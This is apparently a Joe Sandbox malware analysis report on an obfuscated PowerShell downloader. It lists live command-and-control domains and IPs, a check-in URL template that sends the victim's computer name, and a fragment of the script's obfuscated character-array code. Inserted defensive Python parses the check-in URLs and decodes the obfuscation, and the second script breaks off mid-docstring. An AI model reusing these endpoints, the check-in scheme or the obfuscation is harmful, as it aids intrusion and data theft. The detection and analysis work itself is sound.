00000001.00000002.36305951926.00000257AC540000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D732000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D716000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/webhp?tab=ww | powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://lh3.googleusercontent.com/ogw/default-user=s24XI | powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://kmaealcfcalhcac.top | powershell.exe, 00000001.00000002.36241645195.000002579CF8B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://$9bsu5ro72hgpqxk/$x4dbnkmt7rp9vl2.php?id=$env:computername&key=$dekctvjq&s=527 | powershell.exe, 00000001.00000002.36241645195.000002579C58B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579E3C0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://lh3.googleusercontent.com/ogw/default-user=s96Xz | powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://apis.google.comXz | powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000001.00000002.36305951926.00000257AC3D6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.36241645195.000002579F533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC3D6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/finance?tab=we | powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://maps.google.com/maps?hl=en&tab=wl | powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.google.com | powershell.exe, 00000001.00000002.36241645195.000002579D114000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D439000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/PesterXz | powershell.exe, 00000001.00000002.36241645195.000002579C58B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://apis.google.com | powershell.exe, 00000001.00000002.36305951926.00000257AC65F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC540000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.36241645195.000002579C361000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.blogger.com/?tab=wj | powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.google.com/mobile/?hl=en&tab=wD | powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://play.google.com/?hl=en&tab=w8 | powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.36241645195.000002579F533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC3D6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000001.00000002.36241645195.000002579F368000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/imghp?hl=en&tab=wi | powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/shopping?hl=en&source=og&tab=wf | powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://lh3.googleusercontent.com/ogw/default-user=s96 | powershell.exe, 00000001.00000002.36305951926.00000257AC65F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC540000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.36241645195.000002579F3C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579F368000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000001.00000002.36241645195.000002579C58B000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.36241645195.000002579F3C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579F368000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/intl/en/about/products?tab=whXz | powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.google.com/?tab=wo | powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.pngh | powershell.exe, 00000001.00000002.36241645195.000002579F37F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579F3C2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000001.00000002.36305951926.00000257AC3D6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mail.google.com/mail/?tab=wm | powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsoft. | powershell.exe, 00000001.00000002.36318893418.00000257B4526000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.google.com/preferences?hl=en | powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.36241645195.000002579F3C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579F368000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.youtube.com/?tab=w1 | powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schema.org/WebPageXz | powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.htmlXz | powershell.exe, 00000001.00000002.36241645195.000002579C58B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://lh3.googleusercontent.com/ogw/default-user=s24 | powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.google.com/history/optout?hl=en | powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://books.google.com/?hl=en&tab=wp | powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://translate.google.com/?hl=en&tab=wT | powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000001.00000002.36241645195.000002579C58B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pesterh | powershell.exe, 00000001.00000002.36241645195.000002579F37F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579F3C2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.htmlh | powershell.exe, 00000001.00000002.36241645195.000002579F37F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579F3C2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://lh3.googleusercontent.com/ogw/default-user=s24Xz | powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://calendar.google.com/calendar?tab=wc | powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.36241645195.000002579C361000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.v | powershell.exe, 00000001.00000002.36318893418.00000257B4501000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://oneget.org | powershell.exe, 00000001.00000002.36241645195.000002579F368000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.pngXz | powershell.exe, 00000001.00000002.36241645195.000002579C58B000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
45.61.136.138 | kmaealcfcalhcac.top | United States | US | 40676 | AS40676 | true
142.250.191.196 | www.google.com | United States | US | 15169 | GOOGLE | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1589104
Start date and time: 2025-01-11 09:43:32 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 22s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name: Suspected VM Detection
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: download.ps1
Detection: MAL
Classification: mal72.evad.winPS1@2/7@2/2
EGA Information: Failed
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .ps1
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 52.111.227.13
• Excluded domains from analysis (whitelisted): assets.msn.com, ctldl.windowsupdate.com, nexusrules.officeapps.live.com, api.msn.com
• Execution Graph export aborted for target powershell.exe, PID 8624 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:45:36 | API Interceptor | 29x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
45.61.136.138 | download.ps1 | Get hash | malicious | Unknown | Browse | kmaealcfcalhcac.top/n917uo0zpthtr.php?id=user-PC&key=103009180819&s=527
45.61.136.138 | http://diebinjmajbkhhg.top/1.php?s=527 | Get hash | malicious | Unknown | Browse | diebinjmajbkhhg.top/1.php?s=527
45.61.136.138 | download.ps1 | Get hash | malicious | Unknown | Browse | jejmbadfmeenlnk.top/exikvouhlzhtr.php?id=computer&key=73195386263&s=527
45.61.136.138 | download.ps1 | Get hash | malicious | Unknown | Browse | jejmbadfmeenlnk.top/7zp8hc951fhtr.php?id=user-PC&key=47155048466&s=527
45.61.136.138 | download.ps1 | Get hash | malicious | Unknown | Browse | jejmbadfmeenlnk.top/jkhy8nim3ohtr.php?id=computer&key=23808639779&s=527
45.61.136.138 | download.ps1 | Get hash | malicious | Unknown | Browse | jejmbadfmeenlnk.top/rye5ap6jovhtr.php?id=user-PC&key=76750660876&s=527
45.61.136.138 | download.ps1 | Get hash | malicious | Unknown | Browse | canjjclmlnicbga.top/qp49hfdl12htr.php?id=computer&key=36785799113&s=527
45.61.136.138 | download.ps1 | Get hash | malicious | Unknown | Browse | canjjclmlnicbga.top/ujbqd70lwehtr.php?id=user-PC&key=103617095359&s=527
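The eight check-in URLs seen from 45.61.136.138 share one shape: a 15-letter .top host, a script named either "<10 alphanumerics>htr.php" or "1.php", and a query carrying a host name in id=, a long numeric key=, and the constant s=527. As an added example, not code from the report, from the sample, or from Joe Sandbox, the Python below turns that shape into a parser that can be run over proxy or DNS logs. The regular expression and the field rules are an assumption derived only from these eight URLs; the network-side detection that actually fired in this analysis is the Emerging Threats signature for the TA582 check-in, and nothing below reproduces its logic.

```python
import re
from urllib.parse import parse_qs

# Check-in URLs exactly as listed in the report's IP context for 45.61.136.138.
OBSERVED_URLS = [
    "kmaealcfcalhcac.top/n917uo0zpthtr.php?id=user-PC&key=103009180819&s=527",
    "diebinjmajbkhhg.top/1.php?s=527",
    "jejmbadfmeenlnk.top/exikvouhlzhtr.php?id=computer&key=73195386263&s=527",
    "jejmbadfmeenlnk.top/7zp8hc951fhtr.php?id=user-PC&key=47155048466&s=527",
    "jejmbadfmeenlnk.top/jkhy8nim3ohtr.php?id=computer&key=23808639779&s=527",
    "jejmbadfmeenlnk.top/rye5ap6jovhtr.php?id=user-PC&key=76750660876&s=527",
    "canjjclmlnicbga.top/qp49hfdl12htr.php?id=computer&key=36785799113&s=527",
    "canjjclmlnicbga.top/ujbqd70lwehtr.php?id=user-PC&key=103617095359&s=527",
]

# Shape generalised from the eight URLs above (an assumption, not the ET rule's logic):
# optional scheme, 15-letter .top host, then "<10 alphanumerics>htr.php" or "1.php", then a query.
CHECKIN_RE = re.compile(
    r"^(?:https?://)?(?P<host>[a-z]{15}\.top)/(?P<script>[a-z0-9]{10}htr|1)\.php\?(?P<query>[^#]*)$",
    re.IGNORECASE,
)


def parse_checkin(url: str):
    """Return the decomposed check-in fields for a URL of the observed shape, else None."""
    m = CHECKIN_RE.match(url.strip())
    if not m:
        return None
    q = parse_qs(m.group("query"), keep_blank_values=True)
    fields = {
        "host": m.group("host").lower(),
        "script": m.group("script"),
        "id": q.get("id", [None])[0],
        "key": q.get("key", [None])[0],
        "s": q.get("s", [None])[0],
    }
    # Every observed URL carries a numeric s=; the "htr" variant also carries a victim
    # identifier (the Windows host name in the samples) and a purely numeric key.
    if fields["s"] is None or not fields["s"].isdigit():
        return None
    if fields["script"] != "1" and not (fields["id"] and fields["key"] and fields["key"].isdigit()):
        return None
    return fields


def summarise(urls):
    """Group matching URLs by host: script names, victim identifiers and s= values seen."""
    hosts = {}
    for url in urls:
        f = parse_checkin(url)
        if f is None:
            continue
        entry = hosts.setdefault(f["host"], {"scripts": set(), "ids": set(), "s": set()})
        entry["scripts"].add(f["script"])
        if f["id"]:
            entry["ids"].add(f["id"])
        entry["s"].add(f["s"])
    return hosts


if __name__ == "__main__":
    for host, info in sorted(summarise(OBSERVED_URLS).items()):
        print(host, sorted(info["scripts"]), sorted(info["ids"]), sorted(info["s"]))
```

Treat the length constraints (15-letter hosts, 10-character script names) as the brittle part: an operator can change them with one config edit, while the query shape (a host-name id, a numeric key, a constant s) is what the check-in protocol itself needs, so a production rule should lean on the query fields and use the lengths only as a tie-breaker.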
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
kmaealcfcalhcac.top | download.ps1 | Get hash | malicious | Unknown | Browse | 45.61.136.138
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
AS40676 US | download.ps1 | Get hash | malicious | Unknown | Browse | 45.61.136.138
AS40676 US | http://diebinjmajbkhhg.top/1.php?s=527 | Get hash | malicious | Unknown | Browse | 45.61.136.138
AS40676 US | download.ps1 | Get hash | malicious | Unknown | Browse | 45.61.136.138
AS40676 US | download.ps1 | Get hash | malicious | Unknown | Browse | 45.61.136.138
AS40676 US | install.msi | Get hash | malicious | Unknown | Browse | 193.32.177.34
AS40676 US | install.msi | Get hash | malicious | Unknown | Browse | 193.32.177.34
AS40676 US | download.ps1 | Get hash | malicious | Unknown | Browse | 45.61.136.138
AS40676 US | download.ps1 | Get hash | malicious | Unknown | Browse | 45.61.136.138
AS40676 US | 5.elf | Get hash | malicious | Unknown | Browse | 104.149.140.73
                                                                                                          No context
                                                                                                          No context
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):64
                                                                                                          Entropy (8bit):1.1940658735648508
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Nlllulwnxj:NllUSx
                                                                                                          MD5:56D8320D702FE6600E82F4E99701A1E9
                                                                                                          SHA1:874CC256AD8866BCC4F2880ED90E10D047E8481A
                                                                                                          SHA-256:967E51C12B40746E26C9DDE76DDA42228833A07BB7E678E56718182D0ED5F463
                                                                                                          SHA-512:5D0FA9AB700F148FD5CF24F9EC4754A64A9D0944211B8F2A38D60FC3E391F511898D382274E82BA9A83DCCFCA09C743260073C7D411194EF0458C3DD09F7C050
                                                                                                          Malicious:false
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview:@...e................................................@..........
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6222
                                                                                                          Entropy (8bit):3.7380601183863837
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:iYgBCAGPkvhkvCCto7C7tw0/SHy27C7tw0/SHw:iYgZyKC7twoToC7two3
                                                                                                          MD5:CF60F22785B79FC3A3AC0BFFE5D4CE50
                                                                                                          SHA1:46EC883FF1657FCDBBB2C0B5FBDB8509A5B68BDF
                                                                                                          SHA-256:C3F699490C7EBC504B11723987D3E416F252AD4FA4081590F10915910FF69A0D
                                                                                                          SHA-512:60E259E96E6F3D28788B1A6ED0E6130716E31B8BA3ECCCAD6A2DF48DD999158CA53E05235B3723FF9285D63E001894C3802CE2D5CC89286DD1C06BF570AAB3C7
                                                                                                          Malicious:false
                                                                                                          Preview:...................................FL..................F.".. ......A....4....d..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A....m$.'.d...Y...d......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<+Z.E.............................A.p.p.D.a.t.a...B.V.1.....+Z.E..Roaming.@......&W.<+Z.E..............................R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<+Z.E...........................RN.M.i.c.r.o.s.o.f.t.....V.1.....+Z....Windows.@......&W.<+Z.E..........................Coa.W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<+Zt.....................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<+Z......................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<+Z............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<+Z.E....8...........
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6222
                                                                                                          Entropy (8bit):3.7380601183863837
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:iYgBCAGPkvhkvCCto7C7tw0/SHy27C7tw0/SHw:iYgZyKC7twoToC7two3
                                                                                                          MD5:CF60F22785B79FC3A3AC0BFFE5D4CE50
                                                                                                          SHA1:46EC883FF1657FCDBBB2C0B5FBDB8509A5B68BDF
                                                                                                          SHA-256:C3F699490C7EBC504B11723987D3E416F252AD4FA4081590F10915910FF69A0D
                                                                                                          SHA-512:60E259E96E6F3D28788B1A6ED0E6130716E31B8BA3ECCCAD6A2DF48DD999158CA53E05235B3723FF9285D63E001894C3802CE2D5CC89286DD1C06BF570AAB3C7
                                                                                                          Malicious:false
                                                                                                          Preview:...................................FL..................F.".. ......A....4....d..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A....m$.'.d...Y...d......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<+Z.E.............................A.p.p.D.a.t.a...B.V.1.....+Z.E..Roaming.@......&W.<+Z.E..............................R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<+Z.E...........................RN.M.i.c.r.o.s.o.f.t.....V.1.....+Z....Windows.@......&W.<+Z.E..........................Coa.W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<+Zt.....................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<+Z......................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<+Z............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<+Z.E....8...........
                                                                                                          File type:ASCII text, with very long lines (10898), with CRLF line terminators
                                                                                                          Entropy (8bit):5.943165680685654
                                                                                                          TrID:
                                                                                                            File name:download.ps1
                                                                                                            File size:20'643 bytes
                                                                                                            MD5:81b74a62ffc263437801f0e3dbc1b1eb
                                                                                                            SHA1:f1649560edbc7742352cec091f4dc26922d9bdcb
                                                                                                            SHA256:9229403e77c223dc8acb86755f6576ff22ff15362da8b2577a85ed2083205e71
                                                                                                            SHA512:45e2de5567ec6174d4cb91f2d7995f0fa2b5bfbe43897253a2bd2e6303f9d8752455f0c07c2789adda0d2f743ebdf345e8586dee605f76bc1eebdd704bbfcbb5
                                                                                                            SSDEEP:384:FkqH4yQGBHxjB5FRLHC7OmB7eR7pL4+h2+ntWEPp5gOCbh77t18im65W6gipzvR:Fk4b5jB5FRLi75aR7yczobh3t18ik6lz
                                                                                                            TLSH:F4926DE16784E4A2C7CEC72E7A07BC197F11342FE4D9B6C4F298E68266927006D4DCD2
                                                                                                            File Content Preview:$gmpuvkadj=$executioncontext;$esontionaredtionenaroren = ([CHaR[]]@((5081-5028),(5083-5031),(-2900+(9386-6429)),(59450/(6800-5611)),(66024/1179),(1258-1204),(9944-(33144576/(-5084+8436))),(406670/(35705626/4829)),(506770/(88472828/(56680606/5903))),(2862-
                                                                                                            Icon Hash:3270d6baae77db44
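The File Content Preview shows the script building a string from a [CHaR[]] array whose every element is an arithmetic expression, a common PowerShell obfuscation: each expression evaluates to a character code. As an added example, not the sample's own code and not Joe Sandbox tooling, the Python below decodes such arrays with the ast module instead of eval(), so the untrusted script text is parsed but never executed. The input is the preview excerpt above, cut after its ninth complete element and closed by hand because the report truncates it mid-expression; the code assumes the obfuscator only emits divisions with exact integer results, which holds for every element in the preview.

```python
import ast
import operator
import re

# The report's "File Content Preview", cut after the ninth complete array element and
# closed with ")" by hand because the preview itself is truncated mid-expression.
PREVIEW_EXCERPT = (
    "$gmpuvkadj=$executioncontext;$esontionaredtionenaroren = ([CHaR[]]@("
    "(5081-5028),(5083-5031),(-2900+(9386-6429)),(59450/(6800-5611)),(66024/1179),"
    "(1258-1204),(9944-(33144576/(-5084+8436))),(406670/(35705626/4829)),"
    "(506770/(88472828/(56680606/5903)))))"
)

_BINOPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}


def eval_int_expr(text: str) -> int:
    """Evaluate an integer expression using only + - * / and parentheses.

    Anything else (names, calls, attributes, strings) raises ValueError, so script
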